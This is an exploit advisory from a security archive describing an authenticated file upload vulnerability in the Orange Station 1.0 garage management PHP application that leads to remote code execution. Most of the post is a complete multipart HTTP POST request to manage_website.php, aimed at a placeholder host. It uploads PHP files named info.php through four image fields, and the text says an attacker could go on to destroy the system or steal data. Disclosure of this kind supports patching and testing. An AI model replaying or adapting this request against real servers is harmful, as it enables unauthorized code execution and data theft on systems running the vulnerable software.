exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Orange Station 1.0 Shell Upload

Orange Station 1.0 Shell Upload
Posted Mar 26, 2024
Authored by nu11secur1ty

Orange Station version 1.0 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell
SHA-256 | 5a9f8a0ab40cab9d931909357ed512b4a4e0910b05218556dc4ed1977fa5b4d8

Orange Station 1.0 Shell Upload

Change Mirror Download
## Title: ORANGE STATION-1.0 File Upload Remote Code Execution Vulnerability
## Author: nu11secur1ty
## Date: 03/26/2024
## Vendor: https://www.mayurik.com/
## Software: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html
## Reference: https://portswigger.net/web-security/file-upload,
https://www.bugcrowd.com/glossary/remote-code-execution-rce/

## Description:
The parameters back_login_image, login_image, invoice_image, and
website_image in the manage_website.php application are vulnerable for
File Upload and the server is vulnerable for Remote code execution
after this.
The attacker who has credentials to this system can upload any PHP
file and he can destroy the system or he can steal a very
sensitive information.

STATUS: HIGH-CRITICAL Vulnerability

## Exploit:
```POST
POST /garage/garage/manage_website.php HTTP/1.1
Host: pwnedhost.com
Cookie: PHPSESSID=gu6415ln5mmjknq4ofn8tkab0n
Content-Length: 1871
Cache-Control: max-age=0
Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://pwnedhost.com
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryytBZTydZ8OfOJjda
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112
Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://pwnedhost.com/garage/garage/manage_website.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: close

------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="title"

Orange Station
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="footer"

Admin PanelÂÂ
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="short_title"

9090909090
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="currency_code"

Shivaji Nagar, Nashik
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="currency_symbol"

₹
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="old_website_image"

logo.jpg
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="website_image"; filename="info.php"
Content-Type: application/octet-stream

<?php
phpinfo();
?>

------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="old_invoice_image"

logo.jpg
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="invoice_image"; filename="info.php"
Content-Type: application/octet-stream

<?php
phpinfo();
?>

------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="old_login_image"

logo.jpg
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="login_image"; filename="info.php"
Content-Type: application/octet-stream

<?php
phpinfo();
?>

------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="old_back_login_image"

service.jpg
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="back_login_image"; filename="info.php"
Content-Type: application/octet-stream

<?php
phpinfo();
?>

------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="btn_web"


------WebKitFormBoundaryytBZTydZ8OfOJjda--
```

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/03/orange-station-10-multiple-file-upload.html)

## Time spent:
00:27:00


--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>


--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    16 Files
  • 26
    Apr 26th
    14 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close